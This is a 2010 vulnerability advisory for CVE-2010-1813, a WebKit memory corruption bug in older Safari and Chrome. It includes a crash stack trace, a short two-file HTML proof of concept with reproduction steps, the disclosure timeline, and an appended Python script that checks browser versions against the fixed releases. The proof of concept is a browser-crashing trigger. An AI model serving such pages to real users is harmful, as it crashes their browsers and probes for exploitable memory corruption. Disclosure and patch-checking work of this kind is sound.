TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY
TESTED OS: WINDOWS XP SP3
SEVERITY: HIGH
CVE-NUMBER: CVE-2010-1813
DISCOVERED DATE: 2010-06-29
FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)
FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2
DISCOVERED BY: JOSE A. VAZQUEZ

======ABOUT APPLICATION======

"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/

======DESCRIPTION======

A memory corruption vulnerability was confirmed by the Chromium Security Team. The original stack trace showed a null pointer dereference, but some pointers were also corrupted.

Stack trace (using Chrome symbols):

WebCore::RenderObject::containingBlock() Line 597
WebCore::RenderBlock::paintContinuationOutlines() Line 2344
WebCore::RenderBlock::paintObject() Line 2232
WebCore::RenderBlock::paint() Line 1980
WebCore::RenderLayer::paintLayer() Line 2447
WebCore::RenderLayer::paintList() Line 2499
WebCore::RenderLayer::paintLayer() Line 2468
WebCore::RenderLayer::paint() Line 2252
WebCore::FrameView::paintContents() Line 1943
WebCore::ScrollView::paint() Line 797
WebCore::RenderWidget::paint() Line 281
WebCore::InlineBox::paint() Line 180
WebCore::InlineFlowBox::paint() Line 682
WebCore::RootInlineBox::paint() Line 167
WebCore::RenderLineBoxList::paint() Line 219
WebCore::RenderBlock::paintContents() Line 2090
WebCore::RenderBlock::paintObject() Line 2199
WebCore::RenderBlock::paint() Line 1980
WebCore::RenderBlock::paintChildren() Line 2127
WebCore::RenderBlock::paintContents() Line 2092
WebCore::RenderBlock::paintObject() Line 2199
WebCore::RenderBlock::paint() Line 1980
WebCore::RenderLayer::paintLayer() Line 2445
WebCore::RenderLayer::paintList() Line 2499
WebCore::RenderLayer::paintLayer() Line 2468
WebCore::RenderLayer::paint() Line 2252
WebCore::FrameView::paintContents() Line 1943
WebCore::ScrollView::paint() Line 797
WebKit::WebFrameImpl::paintWithContext() Line 1795
WebKit::WebFrameImpl::paint() Line 1818
WebKit::WebViewImpl::paint() Line 979
RenderWidget::PaintRect() Line 390
RenderWidget::DoDeferredUpdate() Line 501
RenderWidget::CallDoDeferredUpdate() Line 428

======PROOF OF CONCEPT======

File 1.html:

<meta http-equiv="refresh" content="1;URL=1.html">
<iframe src="https://www.exploit-db.com/exploits/14967/2.html"></iframe>

File 2.html:

<dialog style='position:relative'>
<h style='outline-style:auto'>X<div></div></h>
</dialog>

======STEPS TO REPRODUCE======

1.- Upload 1.html and 2.html to your server.
2.- Open file 1.html with the vulnerable application.

-Google Chrome:
3.- Wait for a while; the crash then occurs (sad tab).

-Apple Safari:
3.- Wait for a while; if the crash does not occur, press Ctrl+T to trigger it.

======REFERENCES======

[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373
[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html
[ref-3] -> http://support.apple.com/kb/HT4334
[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html

======DISCLOSURE TIMELINE======

Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)

[2010-06-29] => Posted new issue in the Chromium Project (with PoCs).
[2010-06-29] => Chromium confirmed memory corruption and opened a new WebKit bug.
[2010-07-26] => Chromium released a fix (Google Chrome 5.0.375.125).
[2010-09-08] => Apple released a fix (Apple Safari 4.1.2/5.0.2).
[2010-09-10] => Public disclosure.

======CREDITS======

Jose Antonio Vazquez Gonzalez, Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/
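Added example, not part of the original advisory: an exposure check that compares a reported Chrome or Safari version against the fixed versions listed above (Chrome 5.0.375.125, Safari 4.1.2 and 5.0.2). Safari was fixed on two branches, so the comparison must be made against the fix for the same major version; version strings are assumed to be plain dotted numerics as the browsers report them.

```python
from typing import Dict, Tuple

# Fixed versions as stated in the advisory for CVE-2010-1813, keyed by
# major branch. Safari received fixes on both the 4.x and 5.x branches.
FIXED_VERSIONS: Dict[str, Dict[int, Tuple[int, ...]]] = {
    "chrome": {5: (5, 0, 375, 125)},
    "safari": {4: (4, 1, 2), 5: (5, 0, 2)},
}


def parse_version(text: str) -> Tuple[int, ...]:
    """Parse '5.0.375.99' into (5, 0, 375, 99); rejects non-numeric parts."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(p) for p in parts)


def version_lt(a: Tuple[int, ...], b: Tuple[int, ...]) -> bool:
    """Component-wise compare, padding the shorter tuple with zeros so
    that '4.1' is treated as 4.1.0 (which is below 4.1.2)."""
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) < b + (0,) * (width - len(b))


def is_vulnerable(product: str, version: str) -> bool:
    """True if the version predates the fixed release on its branch.
    Assumption: branches older than every fixed branch (e.g. Safari 3.x,
    Chrome 4.x) never received this fix and are reported as vulnerable;
    branches newer than all fixed ones are reported as fixed."""
    fixes = FIXED_VERSIONS[product.lower()]
    v = parse_version(version)
    major = v[0]
    if major in fixes:
        return version_lt(v, fixes[major])
    return major < min(fixes)


if __name__ == "__main__":
    # Constructed sample inventory entries (product, reported version).
    samples = [("chrome", "5.0.375.99"), ("chrome", "5.0.375.125"),
               ("safari", "4.1.1"), ("safari", "5.0.2"), ("safari", "4.1")]
    for product, ver in samples:
        state = "vulnerable" if is_vulnerable(product, ver) else "fixed"
        print(f"{product} {ver}: {state}")
```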